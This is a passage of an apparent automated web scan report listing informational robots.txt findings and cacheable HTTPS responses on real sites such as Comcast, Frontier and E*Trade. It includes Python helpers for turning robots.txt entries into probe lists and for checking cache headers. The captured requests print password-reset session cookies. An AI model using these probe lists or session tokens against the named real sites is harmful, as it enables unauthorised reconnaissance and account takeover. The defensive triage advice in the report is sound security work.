Last-Modified: Wed, 31 Aug 2011 19:04:38 GMT
Content-Type: text/plain
Content-Length: 987
X-Cnection: close
Via: 1.0 www.zillow.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=245
Connection: close

# Access to and use of Zillow.com is governed by our Terms of Use. See http://www.zillow.com/corp/Terms.htm

User-agent: *
Disallow: /claiming/
Disallow: /contact/
Disallow: /corp/Terms.htm
Disallow:
...[SNIP]...

22.99. http://www2.whitefence.com/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:32 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 12:02:32 GMT
Last-Modified: Thu, 25 Sep 2008 22:17:10 GMT
ETag: "c890d-203-48dc0de6"
Accept-Ranges: bytes
Content-Length: 515
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: loginFailed.html
Disallow: /images/
Disallow: /demo/
Disallow: /demo/
Disallow: /nano/
Disallow: /natgascalc/
Disallow: /electric-calculator/
Disallow: /aff/affiliate-b
...[SNIP]...

22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /js-api/compressed/xpbar.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: xfinity.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 12:22:13 GMT
Cache-Control: max-age=300
Content-Type: text/plain
Content-Length: 394
X-Pad: avoid browser bug
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close

# robots.txt for comcast.net :: akamai version

User-agent: *
Disallow: /user/authkey/
Disallow: */data/*
Disallow: /beta/
Disallow: /mycomcast/
Disallow: /b/
Disallow: /c/
Disallow: /d/
Disallow: /e/
...[SNIP]...
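The robots.txt bodies captured in this section are informational on their own, but a tester turns them into a content-discovery list and notes entries that are malformed or that no crawler will honour (a Disallow without a leading slash, a wildcard pattern, a path listed twice). The following is an added example, not part of the XSS.Cx report: it parses three of the bodies shown above (copied from the captured responses, truncated where the report shows [SNIP]), resolves each Disallow entry to an absolute URL and flags the odd ones. The function names and the flag rules are this example's own.

```python
"""Extract Disallow entries from captured robots.txt bodies and flag odd ones.

Added example, not part of the XSS.Cx report. The three sample bodies are
copied from responses captured above (truncated where the report shows
[SNIP]); the function names and the flag rules are this example's own.
"""
from urllib.parse import urljoin

# Constructed from the captured responses in this section.
ROBOTS_SAMPLES = {
    "http://www.whitefence.com/": (
        "User-agent: *\n"
        "Disallow: /test/\n"
        "Disallow: /common/\n"
        "Disallow: /objects/\n"
        "Disallow: /scripts/\n"
        "Disallow: /static/\n"
    ),
    "http://www2.whitefence.com/": (
        "User-agent: *\n"
        "Disallow: loginFailed.html\n"
        "Disallow: /images/\n"
        "Disallow: /demo/\n"
        "Disallow: /demo/\n"
        "Disallow: /nano/\n"
        "Disallow: /natgascalc/\n"
        "Disallow: /electric-calculator/\n"
        "Disallow: /aff/affiliate-b\n"
    ),
    "http://xfinity.comcast.net/": (
        "# robots.txt for comcast.net :: akamai version\n"
        "\n"
        "User-agent: *\n"
        "Disallow: /user/authkey/\n"
        "Disallow: */data/*\n"
        "Disallow: /beta/\n"
        "Disallow: /mycomcast/\n"
    ),
}


def parse_robots(text):
    """Split a robots.txt body into groups of ([user-agents], [(directive, value)]).

    Comments ('#' to end of line) and blank lines are dropped. Consecutive
    User-agent lines share one rule set; a User-agent line that follows a
    rule line opens a new group. Fields seen before any User-agent (for
    example a leading Sitemap:) are ignored here.
    """
    groups, agents, rules, seen_rule = [], [], [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if seen_rule:
                groups.append((agents, rules))
                agents, rules, seen_rule = [], [], False
            agents.append(value)
        elif agents:
            rules.append((field, value))
            seen_rule = True
    if agents:
        groups.append((agents, rules))
    return groups


def disallow_entries(text, agent="*"):
    """Non-empty Disallow values that apply to `agent`, falling back to the '*' group."""
    wanted = agent.lower()
    groups = parse_robots(text)
    chosen = [r for a, r in groups if wanted in [x.lower() for x in a]]
    if not chosen and wanted != "*":
        chosen = [r for a, r in groups if "*" in a]
    return [v for rules in chosen for d, v in rules if d == "disallow" and v]


def review_disallows(base_url, text, agent="*"):
    """Resolve each Disallow entry against base_url and flag entries that need attention.

    relative  - no leading '/', so most crawlers ignore it, but it still names a resource
    wildcard  - contains '*', must be expanded before it can be requested
    duplicate - already listed earlier in the file
    """
    seen, findings = set(), []
    for value in disallow_entries(text, agent):
        flags = []
        if not value.startswith(("/", "*")):
            flags.append("relative")
        if "*" in value:
            flags.append("wildcard")
        if value in seen:
            flags.append("duplicate")
        seen.add(value)
        findings.append({"path": value, "url": urljoin(base_url, value), "flags": flags})
    return findings


def probe_list(base_url, text, agent="*"):
    """Concrete URLs worth requesting by hand: wildcards and repeats are left out."""
    return [f["url"] for f in review_disallows(base_url, text, agent)
            if not {"wildcard", "duplicate"} & set(f["flags"])]


if __name__ == "__main__":
    for base, body in ROBOTS_SAMPLES.items():
        for f in review_disallows(base, body):
            print(f"{f['url']:<50} {','.join(f['flags']) or '-'}")
```

Run as-is it prints one line per entry; `loginFailed.html` on www2.whitefence.com comes out flagged `relative` (a rule most crawlers ignore, yet it names a real resource worth requesting), `*/data/*` on xfinity.comcast.net is `wildcard` and the second `/demo/` is `duplicate`. Feed `probe_list()` to whatever you use for manual requests; it deliberately leaves the wildcard entries out because they need expanding first.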

23. Cacheable HTTPS response
There are 32 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-Control: no-store
Pragma: no-cache

Note that Cache-Control: private only keeps shared caches (proxies) from storing the response; the browser may still write it to disk, so on its own it does not address this issue. Several of the instances listed below are static images and scripts fetched from an HTTPS origin; the finding is only significant where the response body carries account, session or other user-specific data, so each instance should be triaged on its content rather than on the headers alone.
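To separate the instances that matter from the noise, it helps to classify each captured response head by what a browser is actually allowed to do with it. The following is an added example, not part of the XSS.Cx report: it parses raw response heads as they appear in this section (two copied from the captured comcast responses below, one constructed to show the remediation headers) and returns a three-way verdict plus the directives still missing. The verdict names and function names are this example's own.

```python
"""Classify captured HTTPS response heads by whether a browser may store them.

Added example, not part of the XSS.Cx report. The two real sample heads are
copied from responses captured in this section; the 'hardened' head is
constructed to show the remediation headers. Function names and the
three-way verdict are this example's own.
"""

# Response heads as they appear in this section (bodies omitted). The third is constructed.
SAMPLE_RESPONSES = {
    "login.comcast.net overlay-bg.png": (
        "HTTP/1.1 200 OK\n"
        "Date: Tue, 06 Sep 2011 12:28:29 GMT\n"
        "Server: Apache\n"
        "Accept-Ranges: bytes\n"
        "Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT\n"
        "X-Powered-By: Servlet/2.5 JSP/2.1\n"
        "Vary: Accept-Encoding\n"
        "Keep-Alive: timeout=1, max=496\n"
        "Connection: Keep-Alive\n"
        "Content-Type: text/html; charset=UTF-8\n"
        "Content-Length: 2792\n"
    ),
    "www.comcast.com QueryCompletion.cajax": (
        "HTTP/1.1 200 OK\n"
        "Cache-Control: private\n"
        "Content-Length: 38\n"
        "Content-Type: text/html; charset=utf-8\n"
        "Server: Microsoft-IIS/7.5\n"
        "X-AspNet-Version: 2.0.50727\n"
        "Date: Tue, 06 Sep 2011 12:22:11 GMT\n"
        "Connection: close\n"
    ),
    "hardened (constructed)": (
        "HTTP/1.1 200 OK\n"
        "Cache-Control: no-store, no-cache, must-revalidate\n"
        "Pragma: no-cache\n"
        "Expires: 0\n"
        "Content-Type: text/html; charset=utf-8\n"
    ),
}


def parse_head(raw):
    """Return (status_line, {header-name-lowercased: [values]}) from a raw response head."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the head; anything after is body
            break
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def cache_control_directives(headers):
    """Cache-Control tokens as {directive: argument}; directives without '=' map to ''."""
    out = {}
    for value in headers.get("cache-control", []):
        for token in value.split(","):
            token = token.strip()
            if token:
                name, _, arg = token.partition("=")
                out[name.strip().lower()] = arg.strip().strip('"')
    return out


def assess_caching(raw):
    """'not-stored', 'revalidate-only' or 'storable' for one response head.

    not-stored      Cache-Control: no-store is present; no cache may keep the body.
    revalidate-only no-cache, max-age=0 or Pragma: no-cache without no-store: the
                    browser may still write the body to disk and reuse it after a
                    conditional request, so this is not a fix for the issue.
    storable        nothing forbids storage. Cache-Control: private only keeps
                    shared caches (proxies) out; the browser cache is unaffected.
    """
    _, headers = parse_head(raw)
    cc = cache_control_directives(headers)
    pragma = {v.lower() for v in headers.get("pragma", [])}
    if "no-store" in cc:
        return "not-stored"
    if "no-cache" in cc or cc.get("max-age") == "0" or "no-cache" in pragma:
        return "revalidate-only"
    return "storable"


def missing_cache_directives(raw):
    """The remediation directives the head still lacks; an empty list means it is covered."""
    _, headers = parse_head(raw)
    cc = cache_control_directives(headers)
    pragma = {v.lower() for v in headers.get("pragma", [])}
    missing = []
    if "no-store" not in cc:
        missing.append("Cache-Control: no-store")
    if "no-cache" not in pragma:
        missing.append("Pragma: no-cache")
    return missing


if __name__ == "__main__":
    for name, head in SAMPLE_RESPONSES.items():
        print(f"{name:<40} {assess_caching(head):<16} {missing_cache_directives(head) or 'ok'}")
```

Both captured heads come out `storable`: the comcast.net image has no caching directive at all, and the comcast.com endpoint's `Cache-Control: private` does nothing for the browser cache. Only the constructed head is `not-stored`. When triaging, pair the verdict with the content: the PNG and jQuery responses under /myaccount/ carry nothing sensitive even though they are storable (they do, as captured above, declare `Content-Type: text/html; charset=UTF-8` for image and script bodies, which is unrelated to caching but worth recording), whereas a storable response to a password-reset or account page is the real finding.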


23.1. https://login.comcast.net/myaccount/images/overlay-bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/overlay-bg.png

Request

GET /myaccount/images/overlay-bg.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2792

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

23.2. https://login.comcast.net/myaccount/images/sprites/base.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/base.png

Request

GET /myaccount/images/sprites/base.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:33 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14752

.PNG
.
...IHDR...h................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/gradient.png

Request

GET /myaccount/images/sprites/gradient.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=487
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5060

.PNG
.
...IHDR..............i.r....tEXtSoftware.Adobe ImageReadyq.e<...yPLTE.........................................................,,,...===............888.........777555......666..."""###%%%)))99
...[SNIP]...

23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/xfinity_sprite.png

Request

GET /myaccount/images/sprites/xfinity_sprite.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=314
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8117

.PNG
.
...IHDR...J...^.............tEXtSoftware.Adobe ImageReadyq.e<....PLTE.$(.&)....MS...700......."&................ &.vy............iii.NS....$)....$(.....!..........wx...................#'....\
...[SNIP]...

23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/additional-methods.min.js

Request

GET /myaccount/js/additional-methods.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8689

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 Jörn Zaefferer

...[SNIP]...

23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery-1.5.2.min.js

Request

GET /myaccount/js/jquery-1.5.2.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 85925

/*!
* jQuery JavaScript Library v1.5.2
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery.validate.min.js

Request

GET /myaccount/js/jquery.validate.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=499
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20943

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 Jörn Zaefferer

...[SNIP]...

23.8. https://login.comcast.net/myaccount/js/omniture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/omniture.js

Request

GET /myaccount/js/omniture.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=494
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 21653

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...

23.9. https://login.comcast.net/myaccount/js/scripts.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/scripts.min.js

Request

GET /myaccount/js/scripts.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:31:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=495
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2435

function placeFooter(){var C=$("#bd");var E=$("#ft-outer");var A=C.offset().top+C.outerHeight(true);var B=E.outerHeight(true);var D=($(window).height()>(A+B))?"absolute":"static";E.css({position:D})}f
...[SNIP]...

23.10. https://login.frontier.com/webmail/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...

23.11. https://us.etrade.com/e/t/jumppage/viewjumppage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /e/t/jumppage/viewjumppage

Request

GET /e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST HTTP/1.1
Host: us.etrade.com
Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
